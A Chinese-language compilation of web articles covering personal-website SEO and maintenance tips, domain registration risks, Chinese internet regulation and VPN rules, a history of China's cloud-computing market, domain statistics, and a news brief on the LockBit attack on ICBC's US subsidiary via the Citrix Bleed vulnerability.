通过上述策略,你可以提高个人网站或博客的主题吸引力,从而吸引更多的读者。记得在选择主题时,还要考虑自己的兴趣和专业知识,这样才能长期保持创作的动力和内容的质量。 个人网站建设中应该注意哪些SEO优化策略来提高网站流量? 关键词研究与优化 在构建个人网站时,首先需要进行关键词研究,确定与网站内容相关且具有较高搜索量的目标关键词。使用关键词分析工具来评估关键词的搜索量、竞争度和相关性,并将这些关键词自然地融入网站内容中,包括标题、副标题、段落和图片ALT标签,以提高搜索引擎的相关性识别。 网站结构与用户体验优化 确保网站结构清晰、简洁,使用易于理解的URL结构,并通过内部链接建设提高用户体验和搜索引擎的抓取效率。响应式设计对于适应不同设备至关重要,以提供无缝的用户体验。 技术优化 网站速度优化和安全性是技术优化的关键。通过压缩图像、使用浏览器缓存、优化代码等方式提高网站加载速度,并采取安全措施保护网站和用户数据。 内容营销与外部链接建设 创造高质量、原创的内容来吸引用户和提高网站权威性。利用社交媒体整合和外部链接建设策略,如与其他相关网站建立合作关系、参与社区讨论等,以增加外部链接和提高搜索引擎排名。 持续监测与优化 使用网站分析工具监控网站流量、关键词排名和用户行为,根据数据分析结果进行定期更新和优化。SEO是一个持续的过程,需要不断学习和调整策略以适应搜索引擎算法的变化。 通过上述策略的综合运用,个人网站可以在搜索引擎中获得更好的排名,从而吸引更多的访问者和提高网站流量。 个人网站和博客在维护时需要避免哪些常见的错误? 个人网站和博客维护时应避免的常见错误 在维护个人网站和博客时,应特别注意以下几个方面,以避免常见的错误: 忽视备份:定期备份网站数据是至关重要的,以防止数据丢失或遭受黑客攻击。 安全性问题:加强网站的安全性,使用强密码、定期更新软件、安装防火墙等,以防止未授权访问和数据泄露。 忽视更新:网站的内容和软件需要不断更新,以保持网站的正常运行和安全性。 过度优化:避免使用不道德的SEO技巧,以免被搜索引擎惩罚。 忽视用户体验:关注网站的导航、布局、加载速度等,确保网站易于使用,提高用户满意度。 缺乏维护计划:制定详细的维护计划,并按时完成维护任务,以提高维护工作的效率。 忽视响应式设计:确保网站在各种设备上都能良好显示,以适应移动互联网的趋势。 拼写和语法错误:仔细校对网站内容,避免基本的语言错误,这会影响网站的专业形象。 不适当的视觉效果:避免使用动态GIF或过度装饰,这些可能会分散用户注意力,影响网站的专业性。 不良的链接实践:确保链接清晰可见,并在状态栏中显示链接的真实目的地,以建立信任。 通过避免上述错误,可以确保个人网站和博客的健康、安全和用户友好性,从而维持和提升网站的长期价值。 #### 个人身份证域名备案公司有风险吗? 本身非计算机相关的小白,看到一个网络公司,不大,说是做域名备案的,需要用个人的身份证信息进行域名备案,然后公司搭建板块再转手出售,然后就和个人无关了。hr专门跟我说了个人信息的问题,说之前面试的人确实都担心这个,不过他们签合同会专门标注个人信息不会用来违法违规。这种值得去吗,主要是公司作息环境都比较轻松,我就是怕个人信息问题 域名备案是我国互联网管理的基本要求,所有在中国大陆地区注册并使用的域名都需要进行备案。备案的目的是为了管理互联网上的信息,防范网络安全风险,并维护国家和公民的合法权益。 然而,有些公司可能会利用个人的身份证信息进行域名备案,然后公司搭建板块再转手出售,这样的做法可能存在一定的风险。一方面,一旦出现违法行为,个人信息可能会受到牵连。另一方面,如果公司倒闭或者出现其他问题,个人信息可能会泄露,给个人带来不必要的麻烦。 因此,如果你考虑在一家公司工作,并且这家公司需要你提供个人的身份证信息进行域名备案,那么你应该谨慎对待。你可以要求公司签署明确的协议,承诺不会滥用你的个人信息,并且在公司出现任何问题时,会承担相应的责任。同时,你也可以咨询专业人士,了解如何保护自己的个人信息安全。 #### 中国3年来关停违法网站13000多家 你的网站也在其中之一吗 据新华社消息得知,自2015年以来,国家网信办等部门依法约谈违法违规网站2200余家,取消违法违规网站许可或备案、关停违法网站13000多家。 此次,全国人大常委会有关网络安全法、关于加强网络信息保护的决定的执法检查报告指出, 为维护网络空间清朗,各地各有关部门通过开展“扫黄打非”、“剑网”等系列行动,对互联网站、应用程序、论坛、博客、微博、公众账号、即时通讯工具、网络直播中宣扬恐怖暴力、淫秽色情等信息及时清理。 因此也取得了巨大的成果:从2015年至今,共取消违法违规网站许可或备案、关停违法网站13000多家。并且有关网站按照用户服务协议关闭违法违规账号近1000万个。 此外,根据调查,有接近6成的网民认为近年来网络安全明显提升了一个层次,一些关于宣扬恐怖暴力、淫秽色情等违法违规信息行为在一定程度上实施了有效打击与治理,并且明显减少。   对于站长来说,这几年来国内互联网管理越来越严,各种备案审核繁琐程序苦不堪言,今也更是域名全部实名审核,导致很多网站关闭,甚至一些站长失去建站的热情。 主机吧认为,严格的互联网管理是大趋势,站长应该适应国内互联网环境,才能更好的赚钱,在你放弃的时候,人家已经在默默赚钱了呢。 #### 中国VPN监管规定3月31日正式生效 中国的 VPN 监管规定于 3 月 31 日正式生效(付费墙)。这一规定迎合了工信部去年发布的通知,从3月31日起禁止使用未经批准的 VPN。 由于“翻墙”系违法行为,且国内“翻墙”用户众多,根据市场研究曾估测,中国的VPN用户多达9000万。这也让一些游走在灰色地带的翻墙软件(VPN软件)默默赚钱。 但是,事实上,中国对于“翻墙”这一现象曾进行过不少监管: 淘宝开始禁止VPN销售 官方媒体对翻墙软件发出警告 老牌vpn软件Green关闭服务 中国防火墙升级后打击VPN 服务 中国将从1月11日起屏蔽SD-WAN和VPN流量 话说回来,虽然相关部门一直都对“翻墙”有所监管,但这种监管时断时续,要求严的时候就封一阵,要求不严的时候各种翻墙工具就会再次兴起。不过,自从2014年国家成立了网信办,相当于有了专职机构来管理,监管力度也加大了,事关网络空间主权,中国当然不能对这些服务视而不见。 也有分析人士认为,此VPN监管规定的生效将会迫使公司和一些机构从获得批准 、数量有限的 VPN 供应商中进行选择,包括由中国国有电信公司运营的 VPN,而这进一步会让政府更容易瞄准和监控 VPN 通信。 #### 中国云计算市场调研报告:阿里云稳居第一,百度云排第四 7月15日 消息:据Canalys最新发布的中国云计算市场调研报告数据显示, 2019 年第一季度,中国云计算市场规模达到 21 亿美元,已经成为全球第二大云计算市场。其中,阿里云市场份额第一,占比达47.3%,接近全国市场份额的一半。其次是腾讯,占比达15.4%。在全球排名第一的亚马逊只能屈居第三名,市场份额为8.8%。 从目前态势看,中国本土企业在国内云计算市场占据绝对主导地位,但这不仅仅是因为拥有主场优势的缘故。近两年,国内的企业都在积极布局海外市场。在最新的全球云计算市场排名中,阿里巴巴已经超越了老牌云计算巨头IBM,排名全球第四。 来自阿里云官方的数据显示,截至目前,已经有约 40 万个数据库迁移上阿里云。2018 年天猫双11,阿里云数据库成功应对了 100 倍的日常压力,支撑起 2135 亿的总交易额。 Canalys 研究分析师刘畅表示:“无论是在视频、游戏还是电子商务领域,中国企业都在不断赶超。阿里、腾讯、百度等巨头提供的服务都是以云计算为基础的。这推动了他们在全国范围内分布式数据中心上的大量投资,以支持他们不断增长的客户需求和新业务的推出,并维持服务的高可用性。” #### 中国云计算的十年江湖是阿里云崛起的十年 是百度没落的十年 来源:企服行业头条 有云的地方,就有江湖。 有江湖的地方,就免不了战乱纷争。 盘古开天地前,宇宙混沌一片。 云计算在国内诞生之际也是如此。没有先例,没有规矩。 一切都从零开始。 1 初生 2006年,亚马逊CEO贝索斯在EmTech上发表了关于云存储和云计算的概念演讲,并向世界宣布了亚马逊将投资和创立云计算AWS的伟大计划。 但当时国内正处于互联网发展的初期阶段,并不了解云计算。当时有传言说,国内真正懂云计算的人,可能最多不超过10个。 2008年,中国互联网发展迎来了高峰。 网购的蓬勃,尽管让淘宝、支付宝用户激增,但这也导致阿里身陷数据处理囹圄。因为此前国内从未处理过如此庞大的数据。 前段时间朋友圈刷屏的文章《阿里云的这群疯子》,对阿里那段捉襟见肘的历程,描绘的淋漓尽致: “每天早上八点到九点半之间,阿里服务器的使用率都会飙升到98%,离爆棚就差两个百分点。” 很显然,此前依靠传统IOE架构的阿里巴巴,当时的“脑力”已经不够用了。 I(IBM,服务器提供商,他们提供的服务器俗称“小型机”) O(Oracle,数据库提供商,他们的软件是著名的“甲骨文商业数据库”) E(EMC,存储设备提供商,他们提供的是“集中式存储”) 处理大规模数据,需要用到云计算架构,同时调动数以万计的服务器进行处理。这一方案现在看来司空见惯,但当时云计算在国内远不像现在这么广为人知。 那时的云计算对阿里来说,仿佛是一个遥不可及的梦想,实现起来异常艰难。 为了实现飞天梦,马云从微软挖来了王坚。 阿里云这个名字,也第一次被提出。 图片来自网络图片来自网络 说来,阿里云的建立,多少有点赶鸭子上架的意味。 如果传统IOE架构足够便宜、好用,阿里巴巴是很难做到壮士断腕,主动求变,去第一个吃螃蟹的。 鲁迅先生曾称赞:“第一个吃螃蟹的人是很令人佩服的,不是勇士谁敢去吃它呢?” 可并不是所有勇士都能成为发现新大陆的哥伦布,更多的勇士殒命大海,连名字都没留下。 2008~2009年的那段时间,阿里人对云计算的执念并不被外人看好。腾讯、百度基本没在云计算业务上发力。 2 质疑 不可否认,除了马云,BAT另外两位掌门人——马化腾和李彦宏,在当时对云计算的态度,都有些“不屑一顾”。 当然,他们有不屑一顾的本钱。 腾讯在2007年底就收获了第7亿名用户,网络广告收入保持着80%以上的高速增长。2008年,腾讯代理发行的DNF(地下城与勇士)网游火遍中国。 这款游戏的火爆一直持续到现在。腾讯2017年财报显示,个人电脑客户端游戏收入同比增长13%至128亿元。难以想象在10年之后的今天,DNF仍是这一数字增长的主要功臣。 也就是说,长期以来,社交、游戏、广告才一直是腾讯的营收重点。以至于腾讯云在上线后的很长一段时间里,只能隐藏于“其他”细项,跟着别的业务在财报中披露。 同样,当时的百度亦是如此。 2008年,百度的网络营销收入达到了31.945亿元,同比增长83.5%。搜索推广、广告投放等业务,从很早开始就为百度带来大量收入。 直到如今,这些业务仍是百度的重中之重。 在王坚埋头带领手下苦哈哈攻坚云计算的同时,坐拥优质营收入口的腾讯和百度,都不看好云计算。 并且,Pony和Robin并不隐藏对云计算不屑的态度。 想必我们都记得,在2010年3月中国IT领袖峰会上,BAT大佬针对云计算的第一次“华山论剑”。 率先亮剑的是李彦宏。他说: “云计算这个东西,不客气一点讲,它是新瓶装旧酒,没有新东西。早期的时候,15年前(1995年)大家讲客户端跟服务器这个关系,再往后大家讲基于互联网web界面的服务,现在讲云计算。实际上,本质上都是一样。” 图片来自网络图片来自网络 接着,马化腾也发表了点评: “云计算这个话题比较技术性,它是一个比较超前的概念。如果说未来各种综合性业务软件,都不需本地局域网服务器处理,而是由公共网络设施完成,这的确是有想象空间的。可能你过几百年、一千年后,到‘阿凡达’时代,那确实有可能。但现在还是过于早了。” 图片来自网络图片来自网络 要知道,李彦宏和马化腾都是技术出身,对云计算的见解按说应该非常深刻。可偏偏不懂技术的马云却力挺云计算: “我的理解,云计算最后是一种分享,数据的处理、存储并分享的机制。我们自己公司对云计算是充满信心和希望。我们不是觉得这又找到一个新的矿产,阿里巴巴拥有大量消费数据、支付宝交易数据,我们觉得这些数据对我们有用,对社会更有用。” 图片来自网络图片来自网络 很多人说马云“善于画饼”。可在那个时间点,马云敢说这句话,心中还是有底气的。 3 萌发 2008~2009这一年,阿里云的飞天系统可以说是“数据传输问题、计算稳定性问题、处理速度问题一样都不少”。各种错误和bug形式翻新,层出不穷。 连阿里员工都吐槽:明明可以坐高铁,却偏偏要骑自行车去上海。 据当时参与飞天计划的早期员工回忆,阿里的程序员们都是“眼睛干干的,有种想哭的心情”。他们的经典吐槽大概是这样:人家的是云计算,我们家的是“人肉云计算”;人家的是“分布式计算”,我们家的是“分步试计算”..... 可谁都没能想到,就是这种问题层出不穷,连自己亲爹妈都不看好的孩子,竟然在2010年春节过后的一次版本更新后,稳定的超乎寻常。 空气一下安静了。 就像修炼绝世武功一样,以前在身体里乱冲乱撞的气息,一下变顺畅了。阿里云终于找到了打通奇经八脉的法门。 阿里云的成功,开始引起其他公司的注意。很多大公司看到阿里云的先例,就此研究自己的云计算技术。 2010年,巨头华为正式公布云计算战略。 华为掌门任正非表示:“要让全世界所有的人,像用电一样享用信息的应用与服务。” 只不过,华为的进军有点“雷声大雨点小”的感觉。媒体批评华为云“发布但不发力”。 据《财经》报道,很多华为专家认为,华为IT与云计算产品线想做大,就必须有自己的公有云,只不过是由于“在乎运营商的感受”,迟迟未能动手。 任正非出席2010年底的华为云计算发布会时表示,华为做云计算和传统IT企业不同,一定要抱紧电信运营商,否则就是死路一条。 徐直军后来在2013年时也说过,华为将严格限定自己的业务边界,不做云计算的运营商,不与合作伙伴发生竞争关系。 这种捉襟见肘的姿态,让华为云在市场中一度畏首畏尾,导致其在2010~2017年的这段时间内,市场存在感很低,几乎从未在主流公有云调研报告中进入过前五。 BAT外,除了华为,一些初创云厂商开始诞生。 2012年3月,江湖人称“白帽黑客”的季昕华创办UCloud。 这位中国黑客界的高手,曾是任正非、马化腾的重要下属,马云湖畔大学的学生,接受过柳传志的投资。 季昕华很早就看到了云计算的价值。 但是,大公司内部孵化的云计算项目,永远不缺少资源注入。例如阿里巴巴能为阿里云投资60亿元,华为组建2000人的Cloud BU事业部,而创业型云计算厂商只能单打独斗。 没有阿里、腾讯、华为这样的靠山支撑,UCloud早期融资异常艰难。彼时,几乎所有投资人都劝季昕华换个方向。 可季昕华认为,当前云计算对传统IT代替率不足2%,市场需求还未被真正挖掘。未来云计算的前景一定光明的,难点是如何熬过行业的初级阶段。 为了不让UCloud胎死腹中,季昕华决定卖房,把售房款400万元拿来支撑着UCloud一步步前行。 还好,创业路不是孤独的。当时的云计算创业者,不止季昕华一人。 就在UCloud创立一个月后,2012年4月,三位拥有IBM工作经历的黄允松、林源和甘泉,共同创办了青云QingCloud。取意“青云直上、平步青云”。 左起:林源、黄允松、甘泉左起:林源、黄允松、甘泉 自此,中国云计算市场开始萌发。 4 动荡 虽然2012年前后,阿里云的系统趋于稳定,中国也诞生了不少云计算厂商。可面对大规模调动算力这件事,厂商们仍然束手无策。 飞天系统是稳定了,但整个阿里云体系还是乱的。面对5K难题,阿里云又研究了两年,都没能突破这个瓶颈。 三年时间,阿里云却仅走了万里长征的一小步,这不免让阿里云人心飘摇。一时流言四起。很多人直言不讳,骂王坚是骗子。 图片来自网络图片来自网络 有些人受不了,走了。有些人,虽然没走,但也成了流言制造者。 面对流言,马云站出来了。 饼是他画的。那这张饼是继续摊下去,还是关火撤灶,都要由他来决定。 此刻的马云犹豫吗?肯定犹豫。可云计算这是是要做吗?一定要做。 “我每年给阿里云投10个亿,投个十年,做不出来再说。” 2012年的年会,马云说:“我没有想过公司内部对阿里云有那么大的意见,我真没想到。但是你们都扛过来了,这是我深以为傲的。如果你们能抗得过内部人骂,抗得过那么多人指责,我们还有什么扛不过未来五年的发展?” 此后,阿里人再次聚起心气,终于顺利在2013年6月突破5K测试,让大规模计算成为可能。 也正是在那个时间点,所有人都意识到,云时代真的来了。此时再不追随大势,就真的要落后了。 5 并起 第一个选择跟进的大厂是腾讯。 2013年9月,就在阿里云宣布突破5K测试的三个月后,腾讯云宣布正式面向全社会开放。 虽然马化腾当年嘴上说不看好云计算,但私底下却在2010年时就立项研究云计算。面对阿里这个竞争对手,马化腾从未真正掉以轻心。 两个月后的2013年11月,卖房创业的季昕华终于得到了资本认可,UCloud获得DCM、贝塔斯曼投资的1000万美元的A融资。 随后,云计算在中国算是彻底爆发。 •2013年12月,迅达云获得数千万人民币A轮融资。 •2014年1月,青云QingCloud获得B轮2000万美元融资。 •2014年8月,七牛云获得C轮数千万人民币融资。 …… 一时间,群雄并起,中国云市场走向繁荣。 发展并未停止,并且远不止此。 随着小米业务的蓬勃发展,2014年11月,雷军决定All in金山云,并承诺在未来3~5年间向云业务投入10亿美元。 虽然金山云跟进的晚,可架不住金山云有大量的业务数据和真金白银。 依靠上线初期,小米为金山云提供了超过70%的收入,再加上雷军的背书价值,金山云迅速拉拢了大量客户。 关于金山云的发展,雷军曾经表示: “我们必须要全面进攻,不要防守,今天的互联网行业是守不住的,只能往前冲。要想不被巨头挤掉,就是比狠,敢烧钱才能活下去,不敢就不要做,云服务比视频服务更惨烈,如果没有10亿美元的准备和决心,是活不了的。” 就像当年小米冲进手机市场一样,后发的金山云也正在全力追赶老大哥们的步伐。 6 首战 群雄并起就会引发市场争夺,市场争夺的结果,就必然会引发厂商大战。 在云计算市场这个江湖,只有成为老大,才有资格定规矩,才可能拉拢更多的客户。 2015~2016这两年间,中国云计算江湖发生了第一次正面战争。这场大战的主角,正是老对手阿里云和腾讯云。 在这场你追我赶的战役中,几乎一家发布动态,另一家便会迅速跟进。这两座中国互联网的大山,都希望在中国云计算的草莽阶段,就先坐稳江湖老大地位。 第一次对决:12306 VS滴滴 2015年1月15日,12306网站将车票查询业务放到阿里云计算平台上。阿里云承担了12306系统中75%的流量,以往抢票期间系统瘫痪的情况大为改观。马云甚至让阿里云顶尖程序员队伍入驻了12306。 3天后的1月18日,腾讯云2015年渠道伙伴大会召开。大会宣布2015年腾讯云将聚焦于互联网服务领域,并且在游戏、视频、移动应用深耕细作。同时,滴滴成为腾讯云的代表性客户。 第二次对决:60亿VS 100亿 7月29日,阿里巴巴战略投资阿里云60亿人民币,宣布与AWS展开竞争。 9月,腾讯云高调跟进,宣布“未来5年投入100亿发展腾讯云、追赶阿里云”。 第三次对决:双十一VS营收增长100% 11月,阿里云支撑了“双十一”912亿元的交易额,每秒交易创建峰值达14万笔。 一个月后的2016年初,腾讯发布财报表示,2015年腾讯云营收增长100%。 第四次对决:预测娱乐节目冠军VS马化腾亲自站台 2016年4月,阿里云的人工智能ET(当时叫小Ai)基于神经网络、社会计算、情绪感知等原理,成功预测娱乐节目“我是歌手”冠军,被各大媒体争相报道,刷爆微博、朋友圈。 3个月后,在2016年7月的“云+未来”峰会上,马化腾亲自为腾讯云站台,表示未来战略将升级为探索云上生态,实现全面开放。同时对外公布阿里云最近两个季度增速175%和130%,而腾讯云Q3增速已超过200%。 你砍我一刀,我回你一剑。 当然,仗不是白打的,钱也不是白花的。 虽然这场争夺战耗资巨大,可却帮助阿里云和腾讯云实现了快速增长,逐渐拉开了与其他初创厂商的差距。 7 加速 第一次云大战之后,大众开始了解云计算,企业们也不再畏惧业务上云了。 不夸张的说,这一战,直接为中国云计算按了加速键。 企业上云步伐的加快,也催生了资本对云厂商的亲睐。整个2017年可以算作中国云计算发展最快速的一年。 据企服行业头条统计,这一年,至少有20余家大型云计算厂商拿到融资,总金额突破百亿元。 数据整理自网络公开信息数据整理自网络公开信息 此前动态较少、错失良机的华为云,也终于在2017年正式发力。 2017年3月,华为云业务部门Cloud BU真正成立。 8月底,华为云升为一级部门,与消费者事业部、运营商事业部和企业事业部并列作为第四大业务部门,同时增加了2000人进入Cloud BU。 2017年9月,华为云声称全球只需五朵云,要用三年干掉阿里云。 虽然此时,华为云在IDC发布的中国云计算市场统计中还被算在“其他”(Others)里。可前有金山云快速崛起的例子,华为云如果All in三年,也未必不能快速取得进步。 互联网观察家承哲在当时接受企服行业头条采访时表示: “华为主要服务的对象还是政府和大企业,在这方面华为有充分资源和经验。而阿里云是以中小企业为服务对象,经过近10年发展早已抢占中小企业用户心智。用户群体的不同,也决定了两家在定价、业务形态等方面存在较大差异。至于华为云能否三年超过阿里,则要看华为云下一步如何落子。” 此时,就连All in AI的百度都表示,百度云正凭借ABC技术的解决方案,投入到营销、金融、媒体、工业、交通、物流等各个行业中,百度的目标也许是让云业务成为公司未来的现金牛。 百度总裁张亚勤在2017年9月15日的年度百度云智峰会上说道:“虽然百度云来得晚,但增速仍然可观。今年百度云客户数是去年的11倍、同比增长10倍,流量是去年的8倍,收入是去年的4倍。未来在中国至少有三朵云,BAT都能做成,每家都不一样。” 此时的中国云市场,有靠山的有阿里云、腾讯云、金山云、华为云、百度云等,独立发展的劲旅有UCloud、青云QingCloud、华云数据等厂商,基本已显出群雄割据之势。 资本的助推和云计算的快速发展,也催生了中国云计算市场的第二次大战。 8 再战 依旧是阿里和腾讯。第二次云大战以两家的CDN降价开始。 俗话说的好“要想富,先修路”。要想搞好云计算,网络传输就一定要好。而CDN正是云计算中的重要组成。 此前,国内的CDN都由传统老牌厂商操控。那时候中国没有云计算,所以老牌厂商过得顺风顺水,从来不认为云计算的战火会烧到CDN领域。 虽然阿里云曾在2015年宣布CDN降价21%。可是以阿里云当时的用户储量,以及CDN水平,根本不能构成对传统CDN厂商的威胁。 不过,云计算的蓬勃发展,使得大厂的CDN成本越做越低。 为了拉拢用户,2016年末,腾讯云和阿里云分别以“降价25%”和“降价47%”强势进入CDN市场。 几个月后的2017年3月,阿里云宣布CDN再次降价35%。 这还不算完,同年11月22日阿里云又宣布CDN整体降价25%,直接创下了国内CDN最低价。 面对阿里云的接连降价,腾讯云坐不住了。 几天后的11月29日,腾讯终于出手,宣布将CDN价格再次拉至新低——最高降价47%。 与第一次云大战不同,这场大战的参战者,不再是AT两家了。 2017年底,金山云迎来一笔3亿美元融资。 12月12日,金山云在对外发布融资消息同时,宣布价格最大降幅50%。此时,CDN价格已“击穿行业底线”。 仅仅一个月,阿里云、腾讯云、金山云就直接让国内CDN价格三连降,这一举动直接招来了传统CDN巨头网宿、蓝汛的不满。 传统巨头网宿科技坚持“降价无用论”,声称理解不了降价的背后逻辑,降价只会逼走CDN市场的小厂商,却不会对大的市场格局有所影响。 可自这以后,网宿的股价从25元一路跌到不足10元。当时国内CDN市场坐第二把交椅的蓝汛,股价跌到了1美元左右,并且纳斯达克发布了通知函,警告其有退市风险。 尽管网宿的发声,颇有自保意味。但我们必须承认的是,这第二次云大战,也许没有真正的赢家。 因为这场战争,打得连相关领域的头部厂商都受到了波及。整个云计算江湖,都陷入了牵一发而动全身的状态。 今年5月,金山发布2018年半年报。数据显示,CDN大战后,金山云增长缓慢,效果不佳。 而阿里和腾讯经过2017年的CDN血拼后,也在今年渐渐停火。 9 尾声 CND降价大战后,中国的云计算市场进入了战后的冷静,各家厂商休养生息,逐渐找到了自己的发展步调。 今年4月,华为轮值董事长胡厚昆表示,对华为未来保持乐观。未来十年,华为将以每年超过100亿美元的规模持续加大在技术创新上的投入。 6月,UCloud对外宣布获得中国移动投资公司(中移资本)E轮投资。此时的UCloud,已经能与拥有60亿资金的阿里云、拥有两千人的Cloud BU事业部的华为云分庭抗礼了。 腾讯今年虽然股价大跌,但腾讯云在2018年第二季度的收入却翻倍增长,直接促使了2018年9月底,腾讯更改企业架构,成立云与智慧产业事业群,提升对云的重视程度。 而阿里云依旧是那个领跑者。 11月2日,阿里巴巴集团公布2019财年第二季度(2018年7月至9月底)业绩。旗下云计算业务继续保持强劲增长,季度营收达到56.67亿元,整个上半财年营收首次突破100亿元,持续扩大在亚洲市场第一的领先优势。 2018年,中国云计算市场已然更加成熟、稳定。大家基本分好了座次,潜心耕耘自己的用户。 至此,中国云计算的十年江湖,也算是告一段落。 可表面的风平浪静,不代表私底下的暗流涌动。 毕竟古今中外,谁不觊觎王座,谁不垂涎皇冠? 未来,谁知道呢。 -2008~2018中国云计算大事年表- •2008年王坚进入阿里,筹备云计算 •2009年阿里云诞生 •2009年季昕华离开腾讯,开始做盛大云 •2010年3月马云、马化腾、李彦宏“激辩”云计算 •2010年华为发布云计算平台 •2012年3月季昕华离开盛大云,创立UCloud •2012年4月黄允松、林源、甘泉创办青云QingCloud •2013年6月阿里云突破5K测试 •2013年9月腾讯云面向全社会开放 •2013年11月UCloud获得DCM、贝塔斯曼的A轮1000万美金投资 •2013年12月迅达云获得数千万人民币A轮融资 •2014年1月青云QingCloud获得B轮2000万美元融资 •2014年8月七牛云获得C轮数千万人民币融资 •2014年11月金山云成立 •2015年1月15日阿里云宣布与12306合作 •2015年1月18日腾讯宣布与滴滴合作 •2015年3月阿里云CDN降价21% •2105年7月29日阿里云获阿里巴巴战略投资60亿元 •2015年9月腾讯云宣布“未来5年投入100亿发展腾讯云,追赶阿里云” •2015年11月双十一阿里云支撑每秒交易创建峰值14万笔 •2016年初腾讯云营收增长100% •2106年4月阿里云预测娱乐节目冠军 •2016年7月腾讯云Q3增速超200% •2016年末腾讯云和阿里云CDN降价 •2017年各大云厂商接连达到巨额融资 •2017年3月华为云业务部门Cloud BU正式成立 •2017年3月阿里云CDN降价35% •2017年8月腾讯云首度入选Gartner《2017年全球公有云存储服务商魔力象限》 •2017年8月阿里收购七牛云 •2017年8月底华为云升为一级部门,增加2000人进入Cloud BU •2017年9月百度张亚勤称未来在中国至少有三朵云,BAT都能做成 •2017年11月22日阿里云CDN降价25% •2017年11月29日腾讯云CDN降价47% •2017年12月金山云融资3亿美金,CDN降价50% •2018年1月4日金山云宣布D1轮获得2.2亿美元融资 •2018年1月29日金山云宣布D2轮获得2亿美元融资 •2018年4月青云炮轰阿里云 •2018年4月华为云内部批华为云“啥都没有,初级的很” •2018年5月23日腾讯云CDN降价20% •2018年6月UCloud宣布获得中国移动投资公司(中移资本)E轮投资 •2018年9月底腾讯tob架构调整 •2018年11月阿里云季度营收达56.67亿元 #### 中国互联网大会报告 2019:网站数量达 518 万个 10 月 21 日消息:据新京报报道,昨日第六届世界互联网大会举行新闻发布会,发布了《中国互联网发展报告 2019》。 报告显示,截至 2019 年 6 月,中国网民规模为 8.54 亿人,互联网普及率达 61.2%,网站数量 518 万个。 其中网络直播、网络音乐、网络视频等应用的用户规模半年增长均超过 3000 万人,在线教育用户规模达 2.32 亿人,半年增长率为 15.5%,极大满足了人民群众的教育文化娱乐需求。此外,截至 2019 年 6 月,互联网政务服务用户规模达 5.09 亿人,占网民整体的 59.6%。 #### 中国信通院:我国域名注册市场规模降至不足 4000 万个 8 月 26 日消息 今日,中国信通院发布了《互联网域名行业季报(2021 年第二季度)》。 报告指出,新冠肺炎疫情对全球和我国域名行业的影响进一步显现。截至 2021 年 3 月,我国域名注册市场规模降至不足 4000 万个。 根镜像扩展是全球域名系统性能提升的主流方式,全球根服务器及其镜像数量达到 1381 个,覆盖近 160 个国家和地区。 我国用户访问的活跃域名数量达到 4685.3 万个,集中在“.COM”“.CN”和“.NET”顶级域,东南沿海和中西部经济较为发达的省份访问数量较大。 #### 中国信通院:我国用户访问的活跃域名达 5189.6 万个,集中在“.COM”“.CN”和“.NET”顶级域名 6 月 20 日消息,今日,中国信通院发布《互联网域名行业季报(2022 年第一季度)》称,截至 2021 年 12 月,全球和我国域名注册市场规模分别为 3.56 亿个和 3600 余万个,较上季度分别增长 1.4% 和 6.3%。 数据显示,我国用户访问的活跃域名数量达到 5189.6 万个,集中在“.COM”“.CN”和“.NET”顶级域。 中国信通院在报告中指出,我国活跃域名近六成由中国电信提供访问接入,通过互联网服务提供商(ISP)和互联网数据中心(IDC)业务访问仍是主流,通过互联网资源协作服务业务、内容分发网络(CDN)业务访问的域名数量持续增长。 此外,报告称根镜像扩展是全球域名系统性能提升的主流方式,全球根服务器及其镜像数量达到 1523 个,覆盖 160 余个国家 / 地区。 #### 中国台湾地区新浪及微博停止运营 8 月 1 日消息,新浪台湾于 1998 年 11 月正式成立运作,自 2010 年起在台湾市场推广微博服务,旗下微博在台湾已经拥有超过 250 万用户。 今日新浪台湾站(https://www.sina.com.tw/)突然无法进入,经《CNEWS 汇流新闻网》确认,得知新浪即日起暂停台湾市场运营,不再支持相关内容。 新浪微博在台母公司美商华渊资讯股份有限公司台湾分公司表示,「因公司营运策略考量,将暂停台湾市场运营,自 8 月 1 日起将停止新浪台湾网站运营」。 除此之外,新浪于 2013 年推出的「新浪微博台湾站 tw.weibo.com」,经确认,该网站也同样已经无法进入。 新浪是中国门户网站公司,一家服务中国大陆及全球华人社群的中文网络内容服务提供商;而新浪微博则是一个由新浪网推出,提供微博客的社交媒体网站。用户可以通过网页、WAP 页面、手机移动程序等发布动态,并可上传图片和视频或视频直播,实现即时分享,传播互动。 #### 中国域名根服务器来了 网络管理不受制于人 网民都知道域名这件事,但不是所有人都知道WWW互联网域名解析需要根服务器,目前全球13台主要的根服务器中美国控制的有10台,国内尚无自己的根服务器。日前工信部批复设立中国根服务器管理机构,将管理F、I、K、L根镜像服务器。 根据工信部的公告,工信部同意中国互联网络信息中心设立域名根服务器(F、I、K、L根镜像服务器)及域名根服务器运行机构,负责运行、维护和管理编号分别为JX0001F、JX0002F、JX0003I、JX0004K、JX0005L、JX0006L的域名根服务器。 工信部要求,中国互联网络信息中心应严格遵守《互联网域名管理办法》《通信网络安全防护管理办法》及相关法律法规、行政规章及行业管理规定,接受我部的管理和监督检查,建立符合我部要求的信息管理系统并与我部指定的管理系统对接,保证域名根服务器安全、可靠运行,为用户提供安全、方便的域名服务,保障服务质量,保护用户个人信息安全,维护国家利益和用户权益。 除了中国互联网络信息中心的根域名服务器之外,工信部还批复了北京市工程研究中心有限公司设立域名根服务器(L根镜像服务器)及域名根服务器运行机构的申请,后者将负责运行、维护和管理编号分别为JX0007L的域名根服务器。 #### 中国工商银行美国子行遭 LockBit 黑客团队攻击 11 月 20 日消息,中国工商银行(ICBC)美国子行 ICBCFS 在本月初遭到黑客组织 LockBit 攻击,使得部分系统中断,但工商银行强调此一意外并未波及总行以及其它境内外的附近机构。 据了解,ICBCFS 是中国工商银行位于纽约的全资子公司,专门提供全球机构客户的清算、执行、融资与设施管理服务,也具备全球市场的结算能力,旗下的清算产品包括美国股票、美国国债、全球股票、欧元债券及 ETF 等。 ICBCFS 此前已在官网上证实遭到 LockBit 攻击,并在发现之后马上切断并隔离了受到影响的系统以控制灾害,并展开了一系列调查及复原工作,威胁研究员 Kevin Beaumont 日前便针对这一网络安全事件进行了分析。 据悉,黑客组织 LockBit 之所以能够攻入工商银行美国分行,这是因为美国分行未修补 Citrix NetScaler 设备的漏洞 Citrix Bleed(CVE-2023-4966,CVSS 风险评分为 9.4),而这一漏洞在今年 8 月末就已经遭到黑客利用,Kevin Beaumont 同时指出,截至 11 月 14 日,仍有大约 5000 个企业组织尚未修复 Citrix Bleed 漏洞。 ▲ 图源 Kevin Beaumont  